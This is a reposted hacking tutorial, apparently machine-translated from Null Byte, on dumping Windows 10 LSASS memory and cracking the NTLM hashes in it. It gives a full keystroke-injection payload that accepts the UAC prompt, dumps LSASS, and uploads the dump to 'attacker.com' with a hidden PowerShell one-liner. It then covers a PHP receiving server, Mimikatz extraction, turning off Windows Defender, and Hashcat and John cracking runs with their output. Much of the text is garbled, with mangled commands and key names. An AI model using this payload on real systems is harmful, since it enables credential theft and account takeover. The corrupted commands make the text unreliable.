قالب وردپرس درنا توس
Home / Tips and Tricks / Backing up NTLM hashes and cracking Windows passwords «Null Byte :: WonderHowTo

Backing up NTLM hashes and cracking Windows passwords «Null Byte :: WonderHowTo



Windows 10 passwords stored as NTLM hashes (or more accurately, as NT hashes) can be stored in seconds and transferred to an attacker's system. The hashes can be brutally forced and cracked to reveal the passwords in plain language with a combination of tools, including Mimikatz, ProcDump, John the Ripper, and Hashcat.

Before We Talk About Local The Security Authority Subsystem Service (LSASS) is an integral part of the Windows operating system.

LSASS is responsible for authoritative domain authentication, Active Directory administration, and security policy enforcement. It generates the processes responsible for authenticating users with NTML and verifies the validity of logins. Because this is critical to the functionality of the operating system, hackers often rename malicious executables after the process.

Mimikatz & ProcDump

Mimikatz, created by gentilkiwi, can be used for extracting password hashes and Kerberos tickets, and PIN codes from the memory of Windows 1

0. Since its inception, Mimikatz has been used worldwide for Headlines worried and has become known for its ability to extract confidential credentials from a running Windows computer.

Windows Defender and antivirus software can more effectively detect mimic set executions and signatures (see below).

VirusTotal detection rates for the latest mimic set version.

In combination with Mimikatz, hackers now use ProcDump, a stand-alone executable designed for administrators to monitor application crashes.

ProcDump is used to extract the LSASS dump, which is later moved to a Windows 10 offline computer and parsed with Mimikatz. This is still an effective way to extract credentials from Windows 10 because ProcDump is a signed Microsoft binary file and is not selected by most anti-virus programs (see below) ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

The Windows 10 Task Manager can also be used to save the LSASS memory without the help of Mimikatz or ProcDump. The following is an example of a mousejack payload designed to extract and filter the LSASS dump with only exploits by keystroke injection and PowerShell. The attack is completed in less than ten seconds (for interpretation, it was slowed down in certain places).

The Task Manager will open in the Run window with Administrator privileges. The screen goes blank for one second due to the User Access Control (UAC) prompt, which prevents the GIF creator from recording the screen. The local security authority process (lsass.exe) is then in the list of processes and is stored (by default) in the% TEMP% directory. A PowerShell one-liners will then be executed completely through the execution window. The LSASS dump is compressed into a ZIP file and sent to the attacker's server.

At this point, the attacker can use mimic kit on an offline Windows 10 computer or a virtual machine (on which antivirus software is not installed) to extract hashing of passwords.

Step 1: Create Payload for Keypress Injection

The following Payload for Keypress Injection can be called with Mousejack Vulnerabilities or a USB Rubber Ducky.

While MouseJack vulnerabilities became known a few years ago, ten of millions of keyboards and mice (including Logitech devices) still feared keypress injection . As Marcus Mengs, creator of P4wnP1 in his proof-of-concept video demonstrates, Logitech dongles are still vulnerable to remote attacks.

Comments ( REM ) For clarity, a 2.5 second delay was added to each line in the payload
REM mount the USB Rubber Ducky. This initial delay is not
REM required for mousejack attacks.
Delay 2500

REM Opens the execution command window.
GUI r

REM The execution command window opens for 1 second.
DELAY 1000

REM Enter "taskmgr" (ie Task Manager) in the execution window.
STRING taskmgr

REM delay for 0.5 seconds.
Delay 500

REM Ctrl + Shift + Enter key combination is pressed to enter
Go to the User Account Control (UAC) window. This will lead to it
REM taskmgr to open with administrator rights.
CTRL + SHIFT ENTER

Allow REM popup of the UAC window. This may take a few seconds
REM on some Windows 10 computers.
Delay 2500

REM ALT + y Keyboard shortcut for accepting and bypassing user account control
REM command prompt.
ALT y

REM Wait a few seconds for Task Manager to open completely
REM administrator rights. This took me (on average) 5.5 seconds in my
SEM tests. In some scenarios with high-end CPUs, this delay occurs
REM can be significantly lower.
DELAY 5500

REM Press the keyboard down to move from the toolbar to
REM list of active background processes.
LOW

REM Enter "local" to jump down and highlight "Local Security"
REM Authority Service ".
STRING local

The shortcut REM SHIFT + F10 invokes the right-click options
REM menu.
SHIFT key F10

REM The options menu opens completely after 1.2 seconds.
DELAY 1200

REM Press the keyboard four times to highlight Create
"REM dump file."
LOW
LOW
LOW
LOW

REM Press Enter to select Create Dump File.
ENTER

REM Wait 3.5 seconds for the backup file to create and save itself
REM in the% TEMP% directory.
DELAY 3500

REM Press Enter to select "OK" and close the dump popup window.
ENTER

REM ALT + F4 combination to close the Task Manager window.
OLD F4

REM Wait 0.7 seconds for Task Manager to close.
Delay 700

REM Reopen the execution command window.
GUI r

REM Wait 0.7 seconds for the execution window to open.
Delay 700

REM PowerShell One-Liner for compressing and exfiltrating the LSASS
REM dump file. Every part of the one-liners is explained in greater
REM detail below.
STRING powershell -ep bypass / w 1 / C $ t = $ env: temp; $ l = & # 39; lsass.DMP & # 39 ;; compress-archive path $ t $ l-destination path $ t a.zip; iwr attacker.com /i.php method POST -Infile $ t a.zip

REM Press Enter to run the PowerShell one-liners.
ENTER

The PowerShell payload consists of several commands concatenated by semicolons:

  • powershell -ep bypass / w 1 / C – The ExecutionPolicy (-ep) is set to "bypass" to Running PowerShell over Windows allows Defender and some antivirus software. The WindowStyle (/ w) is set to "1", which immediately hides the PowerShell popup terminal.
  • $ t = $ env: temp; – The temporary directory of the target is set to $ t. Using single-letter variables helps to shorten the overall payload length. This is more effective than typing "C: Users % USERNAME% AppData Local Temp" over and over again.
  • $ l = & # 39; lsass.DMP & # 39 ;; – The lsass.DMP filename is set to the $ l variable. This file name is defined automatically by Task Manager.
  • Compress archive path $ t $ l target path $ t a.zip; – The Compact Compact PowerShell cmdlet is used to compress the lsass.DMP (-path) to the a.zip (-destinationpath) file.
  • iwr attacker.com/i.php method POST -infile $ t a.zip – Invoke web request (iwr) sends the a.zip (-infile) to the server as a POST request the attacker. Make sure that "attacker.com" is changed to Kali's local IP address or virtual private server address.

Step 2: Intercepting the LSASS Dump

Before you perform a keyboard input, a PHP server is required to intercept the exfiltrated dump.

The keystroke payload expects a server on port 80. In this example, Kali Linux is used on a local network for simplicity, so root privileges are already in use. However, setting up on a virtual private server requires root to open a monitoring service on port 80.

Non-Kali users can start with the following command.

  ~ $ sudo su 

Then create a directory named "phpServer /" with the following command mkdir .

  ~ $ mkdir phpServer / 

Use the cd command to change to the phpServer / directory. ~ $ cd phpServer /

Create a file named "i.php" with nano .

  ~ $ nano i.php 

Paste the following PHP script into the nano-terminal. Once this is done, press to save and exit the Nano Terminal Ctrl + x then y and then Enter .

   

This simple PHP script can catch ZIP files and does not need to be modified in any way to work. When the Windows 10 target computer sends a ZIP file, this PHP server stores the data with the time as the file name.

Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start a web server, while instructs 0.0.0.0 to host the server on each IPv4 interface.

  ~ $ php -S 0.0.0.0: 80

PHP 7.3.0-2 Development Server has been started
Listen to http://0.0.0.0:80
The document root is / root / phpServer
Press Ctrl-C to exit. 

Step 3: Extract the hashes with mimic set.

After the .zip file has been intercepted, move it to a Windows 10 computer or virtual machine. Extract it to find the file lsass.DMP.

Disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "Virus".

Click "Anti-virus and threat protection settings" and deselect all available options. Alternatively, a virtual machine that does not have Windows Defender or Smartscreen installed can be configured for Mimikatz antics.

At the time of writing this document is the latest version by Mimikatz 2.2.0, Carlos update. Open a web browser and navigate to its GitHub repository to find the latest version of mimikatz_trunk.zip.

After unzipping the Mimic ZIP file, open a PowerShell terminal. Use the following command to run the mimikatz.exe file. The mimikatz prompt appears.

  C: > PS & C:  Users  $ env: username  PATH  TO  MIMIKATZ  x64  mimikatz.exe

#####. mimicze 2.2.0 (x64) # 18362 August 13, 2019 01:35:04
, "A La Vie, a L & # 39; Amour" - (oe.eo)
## /  ## / *** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
##  / ##> http://blog.gentilkiwi.com/mimikatz
& # 39; ## v ## & # 39; Vincent LE TOUX (vincent.letoux@gmail.com)
& # 39; ##### #> http://pingcastle.com / http://mysmartlogon.com *** /

mimikatz # 

The following command sekurlsa :: minidump loads lsass.DMP into mimikatz.

  mimikatz # sekurlsa :: minidump C:  Users % USERNAME%  Documents  lsass.DMP

Go to MINIDUMP: & # 39; C:  Users  tokyoneon  Documents  lsass.DMP & # 39; 

Then use the command sekurlsa :: logonPasswords to extract hashed credentials. Since Windows 8, plain text passwords are no longer stored without the operating system having to be changed further. However, this does not mean that Windows 10 hashes can be brutally enforced and easily cracked. In line 12 we find the hashed password in NTLM format.

  mimikatz # sekurlsa :: logonPasswords

Open: & # 39; C:  Users  tokyoneon  Documents  lsass.DMP & # 39; File for mini dump ...

1 authentication ID: 0; 102597 (00000000: 000190c5)
2 session: interactive from 1
3 username: tokyoneon
4 domain: MSEDGEWIN10
5 logon server: MSEDGEWIN10
6 Registration time: 31.05.2013 01:01:05 o'clock
7 SID: S-1-5-21-3859058339-3768143778-240673529-1000
8msv:
9 [00000003] Primary
10 * Username: tokyoneon
11 * Domain: MSEDGEWIN10
12 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e
13 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406
14 tkg:
15 wdigest:
16 * Username: tokyoneon
17 * Domain: MSEDGEWIN10
18 * Password: (null)
19 Kerberos:
20 * Username: tokyoneon
21 * domain: MSEDGEWIN10
22 * Password: (null)
23 ssp:
24 credman:

25 Authentication ID: 0; 102306 (00000000: 00018fa2)
Session 26: Interactive from 1
27 username: tokyoneon
28 Domain: MSEDGEWIN10
29 Login Server: MSEDGEWIN10
30 Registration time: 31.05.2013 01:01:05 o'clock
31 SID: S-1-5-21-3859058339-3768143778-240673529-1000
32msv:
33 [00000003] Primary
34 * Username: tokyoneon
35 * Domain: MSEDGEWIN10
36 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e
37 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406
38 tspkg:
39 wdigest:
40 * Username: tokyoneon
41 * Domain: MSEDGEWIN10
42 * Password: (null)
43 Kerberos:
44 * Username: tokyoneon
45 * Domain: MSEDGEWIN10
46 * Password: (null)
47 ssp:
48 credman:

49 Authentication ID: 0; 74052 (00000000: 00012144)
50 Session: Service from 0
51 username: sshd_server
52 Domain: MSEDGEWIN10
53 Login Server: MSEDGEWIN10
54 Registration time: 31.05.2013 01:01:04 o'clock
55 SID: S-1-5-21-3859058339-3768143778-240673529-1003
56msv:
57 [00000003] Primary
58 * Username: sshd_server
59 * Domain: MSEDGEWIN10
60 * NTLM: 8d0a16cfc061c3359db455d00ec27035
61 * SHA1: 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
62 tspkg:
63 wdigest:
64 * Username: sshd_server
65 * Domain: MSEDGEWIN10
66 * Password: (null)
67 Kerberos:
68 * Username: sshd_server
69 * Domain: MSEDGEWIN10
70 * Password: (null)
71 ssp:
72 credman:

mimikatz # 

Step 4: Enforcing the NTLM hash

Research has shown that most passwords consist of six to eight characters and end with two digits.

As a small experiment. I wanted to know how long a Raspberry Pi 3B +, a common Intel i7 CPU, and a GeForce GTX GPU would need to crack the same hash, which consists of six random characters and ends with two random numbers (for example: nchfyr56).

. 1 Brute Force with Raspberry Pi 3B + (John the Ripper)

After installing John the Ripper on a Raspberry Pi 3B +, the password (nchfyr56) was guessed at in just over five hours. Given that most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly handy for enforcing NTLM hashes.

Available at Amazon: CanaKit Raspberry Pi 3B + with power supply

  ~ $ john -mask =? l? l? l? l? l? d? d - format = NT / root / Desktop / hash

Use standard input encoding: UTF-8
1 password hash loaded (NT [MD4 32/32])
Warning: No OpenMP support for this hash type. Note --fork = 4
Press & # 39; q & # 39; or Ctrl-C to cancel the operation, almost every other button for the status

nchfyr56 (?)

1 g 0: 05: 19: 24 READY (2018-06-22 16:36) 0.000052 g / s 1389 Kp / s 1389 Kc / s 1389 Kc / s achfyr56..zuhfyr56
Use the --show --format = NT options to reliably display all cracked passwords
Session ended 

2. Brute-Force with Intel i7 CPU (Hashcat CPU)

It took only three minutes, but an estimated fifteen minutes, to crack the entire key range to crack the same NTLM hash on an old Intel i7.

  ~ $ hashcat / tmp / hash -m 1000 -a3? l? l? l? l? l? l? d? d

hashcat (v5.1.0) starts ...

OpenCL Platform # 1: The pocl project
===================================
* Device # 1: Intel (R) Core (TM) i7-3537U CPU at 2.00 GHz, assignable to 2048/5809 MB, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56

Session ..........: hashcat
Status ...........: Broken
Hash.Type ........: NTLM
Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started .....: Fri Aug 31 21:48:25 2019 (2 minutes, 50 seconds)
Time.Estimated ...: Fri Aug 31 21:51:15 2019 (0 secs)
Guess.Mask .......:? L? L? L? L? L? D? D [8]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 35719.8 kH / s (7.23 ms) @ Acceleration: 512 Loops: 128 Thr: 1 Vec: 8
Recovered ........: 1/1 (100.00%) digests, 1/1 (100.00%) salts
Progress .........: 6049366016/30891577600 (19.58%)
Rejected .........: 0/6049366016 (0,00%)
Restore.Point ....: 344064/1757600 (19.58%)
Restore.Sub. # 1 ...: Salt: 0 Amplifier: 896-1024 Iteration: 0-128
Candidates. # 1 ....: hstrxp56 -> tjoqxn56

Start: Friday, August 31st, 9:48:09 pm 2019
Stopped: Fri 31.08. 21:51:16 clock 2019 

3. Brute force with GeForce GTX GPU (Hashcat GPU)

The NTLM hash was cracked in less than a second. This was achieved with a relatively simple GeForce GTX 1060 GPU.

  ~ $ hashcat / tmp / hash -m 1000 -a3? L? L? L? L? L? L? D? D

OpenCL Platform # 1: NVIDIA Corporation
=====================================
* Device 1: GeForce GTX 1060, 3 GB, 754/3018 MB assignable, 9 MB CPU

7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56

Session ..........: hashcat
Status ...........: Broken
Hash.Type ........: NTLM
Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started .....: Fri Aug 31 03:00:38 2019 (0 sec.)
Time.Estimated ...: Fri Aug 31 03:00:38 2019 (0 secs)
Guess.Mask .......:? L? L? L? L? L? D? D [8]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 4658.0 MH / s (7.06 ms) @ Acceleration: 128 Loops: 32 Thr: 1024 Vec: 1
Recovered ........: 1/1 (100.00%) digests, 1/1 (100.00%) salts
Progress .........: 1094713344/30891577600 (3.54%)
Rejected .........: 0/1094713344 (0,00%)
Restore.Point ....: 0/1757600 (0,00%)
Restore.Sub # 1 ...: Salt: 0 Amplifier: 896-928 Iteration: 0-32
Candidates # 1 ....: hstera12 -> eusind80
Hardware.Mon. # 1 ..: Temp: 34c Fan: 25% Usage: 92% Core: 1898MHz Mem: 3802MHz Bus: 16

Start: Friday, August 31, 03:00:34 clock 2019
Stopped: Fri Aug 31 03:00:39 2019 

When testing strong passwords with eight characters and two digits (for example, Psjhfhdd48) against the GPU, the hash was cracked in less than twenty-five minutes.

  ~ $ hashcat / tmp / hash2 -w4 -O -m 1000 -a3? u? l? l? l? l? l? l? d? d

OpenCL Platform # 1: NVIDIA Corporation
=====================================
* Device 1: GeForce GTX 1060, 3 GB, 754/3018 MB assignable, 9 MB CPU

30346ad7463810ea4d5a58090611e368: Psjhfhdd48

Session ..........: hashcat
Status ...........: Broken
Hash.Type ........: NTLM
Hash.Target ...: 30346ad7463810ea4d5a58090611e368
Time.Started .....: Fri Aug 31 03:19:11 2019 (23 minutes, 28 seconds)
Time.Estimated ...: Fri Aug 31 03:42:39 2019 (0 secs)
Guess.Mask .......:? U? L? L? L? L? L? D? D [10]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 12459.0 MH / s (97.89 ms) @ Acceleration: 256 Loops: 676 Thr: 1024 Vec: 1
Recovered ........: 1/1 (100.00%) digests, 1/1 (100.00%) salts
Progress .........: 17567648317440/20882706457600 (84,13%)
Rejected .........: 0/17567648317440 (0,00%)
Restore.Point ....: 25985286144/30891577600 (84.12%)
Restore.Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676
Candidates. # 1 ....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon. # 1 ..: Temp.: 73c Fan: 50% Usage: 100% Core: 1835MHz Mem: 3802MHz Bus: 16

Started: Friday, August 31, 03:19:09 clock 2019
Stopped: Fri Aug 31 03:42:40 2019 

It has been estimated that NTLM hashes with even greater integrity (eight characters + four digits) take about two days to crack.

  ~ $ hashcat / tmp / hash3 -w4 - O -m 1000 -a3? U? L? L? L? L? L? L? D? D? D

Session ..........: hashcat
Status ...........: Running
Hash.Type ........: NTLM
Hash.Target ......: aa110854b242ed77c07be54e62611464
Time.Started .....: Fri Aug 31 03:43:40 2019 (45 secs)
Time.Estimated ...: Sun Sept 2 01:48:09 2019 (1 day, 22 hours)
Guess.Mask .......:? U? L? L? L? L? L? D? D? D [12]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 12589.8 MH / s (96.68 ms) @ Acceleration: 256 Loops: 676 Thr: 1024 Vec: 1
Recovered ........: 0/1 (0.00%) digests, 0/1 (0.00%) salts
Progress .........: 559804317696/2088270645760000 (0.03%)
Rejected .........: 0/559804317696 (0,00%)
Restore.Point ....: 828112896/3089157760000 (.03%)
Restore.Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676
Candidates. # 1 ....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon. # 1 ..: Temp.: 65c Fan: 38% Util: 100% Core: 1847MHz Mem: 3802MHz Bus: 16

[s] tatus [p] ause [b] ypass [c] heckpoint [q] uit => 

For hackers with dedicated brute-force machines, two days are very realistic. With a group of superior GPUs, an attacker can easily crack any hash coming from a larger key area.

Follow me until next time on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or write me a message on Twitter if you have questions.

Do not miss: Getting Started with Hacking Windows 10

Cover photo by Alex Kotliarskyi / Unsplash; Screenshots of tokyoneon / null byte




Source link